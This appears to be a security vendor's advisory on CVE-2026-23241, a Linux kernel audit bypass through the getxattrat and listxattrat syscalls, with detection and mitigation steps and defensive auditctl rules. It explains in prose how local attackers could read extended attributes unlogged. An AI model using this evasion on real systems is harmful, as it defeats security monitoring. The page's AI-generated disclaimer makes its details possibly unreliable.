CVE-2026-23241 Overview
A vulnerability has been identified in the Linux kernel's audit subsystem where the "at" variants of getxattr() and listxattr() syscalls are missing from the audit read class. This oversight allows attackers to bypass audit rules when reading extended attributes from files using getxattrat() or listxattrat() syscalls, effectively evading security monitoring and logging mechanisms.
Critical Impact
Attackers can read extended file attributes without triggering audit rules, bypassing security monitoring and potentially accessing sensitive metadata undetected.
Affected Products
- Linux Kernel (versions with audit subsystem prior to patch)
Discovery Timeline
- 2026-03-17 - CVE CVE-2026-23241 published to NVD
- 2026-03-18 - Last updated in NVD database
Technical Details for CVE-2026-23241
Vulnerability Analysis
This vulnerability represents a security control bypass in the Linux kernel's audit framework. The audit subsystem is responsible for monitoring and logging system calls to track security-relevant events. Each syscall is categorized into audit classes (read, write, execute, etc.) that determine which rules apply to them.
The getxattrat() and listxattrat() syscalls are the "at" variants of their counterparts (getxattr() and listxattr()), which operate relative to a directory file descriptor rather than the current working directory. These syscalls allow reading extended attributes from files, which may contain sensitive metadata including security labels, access control lists, and other system-critical information.
Due to the missing classification of these syscalls in the audit read class, standard audit rules designed to monitor file read operations fail to capture these specific syscall invocations.
Root Cause
The root cause is an incomplete syscall classification in the Linux kernel's audit subsystem. When the getxattrat() and listxattrat() syscalls were implemented, they were not added to the AUDIT_CLASS_READ definition, causing them to be excluded from audit rules that monitor read operations. This omission means audit rules such as -w /tmp/test -p rwa -k test_rwa do not trigger when these syscalls access the monitored files.
Attack Vector
An attacker with local access to the system can exploit this vulnerability to read extended attributes from files without generating audit logs. The attack scenario involves:
- Identifying files with valuable extended attributes (ACLs, security labels, capabilities)
- Using getxattrat() or listxattrat() instead of the standard variants
- Successfully reading the extended attributes while bypassing configured audit rules
This allows for stealthy reconnaissance and information gathering on systems where audit logging is relied upon for security monitoring and forensic analysis.
Detection Methods for CVE-2026-23241
Indicators of Compromise
- Unexpected use of getxattrat() or listxattrat() syscalls in process traces
- Gaps in audit logs where file attribute access is expected but not recorded
- Evidence of extended attribute access in application logs not corroborated by audit trails
- Suspicious processes accessing sensitive files without corresponding audit events
Detection Strategies
- Enable syscall-level tracing with tools like strace or eBPF programs to capture all xattr-related syscalls
- Implement additional monitoring using auditd rules that explicitly target getxattrat and listxattrat syscalls by number
- Deploy kernel-level monitoring solutions that operate independently of the audit framework
- Review system logs for discrepancies between expected and actual audit coverage
Monitoring Recommendations
- Monitor for processes using the "at" variants of xattr syscalls through alternative logging mechanisms
- Implement SentinelOne Singularity Platform for comprehensive kernel-level visibility that does not depend solely on audit framework classification
- Regularly verify audit rule coverage against actual syscall usage patterns
- Set up alerts for any security-sensitive file access that should generate audit events but doesn't appear in logs
How to Mitigate CVE-2026-23241
Immediate Actions Required
- Apply the kernel patches that add the missing syscalls to the audit read class
- Temporarily add explicit audit rules for the getxattrat and listxattrat syscalls by syscall number
- Review recent audit logs for potential gaps in monitoring coverage
- Assess systems where audit compliance is critical for potential exposure during the vulnerability window
Patch Information
The Linux kernel maintainers have released patches to address this vulnerability. The fix adds the missing getxattrat() and listxattrat() syscalls to the audit read class, ensuring proper logging of these operations.
Relevant kernel commits:
- Commit a2e8c144299c31d3972295ed80d4cb908daf4f6f
- Commit ad37505ce869a8100ff23f24eea117de7a7516bf
- Commit bcb90a2834c7393c26df9609b889a3097b7700cd
For additional technical details on the discovery, see the Benc Teux Syscalls Audit Blog.
Workarounds
- Add explicit audit rules targeting the syscall numbers for getxattrat and listxattrat until patches can be applied
- Deploy supplementary monitoring tools that capture syscall activity independently of the audit class definitions
- Use application-layer logging to track extended attribute access where possible
- Consider restricting access to sensitive files through additional access controls while awaiting kernel updates
# Example: Add explicit audit rules for missing syscalls (syscall numbers vary by architecture)
# Check your architecture's syscall table for correct numbers
auditctl -a always,exit -S getxattrat -k xattr_bypass_monitor
auditctl -a always,exit -S listxattrat -k xattr_bypass_monitor
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
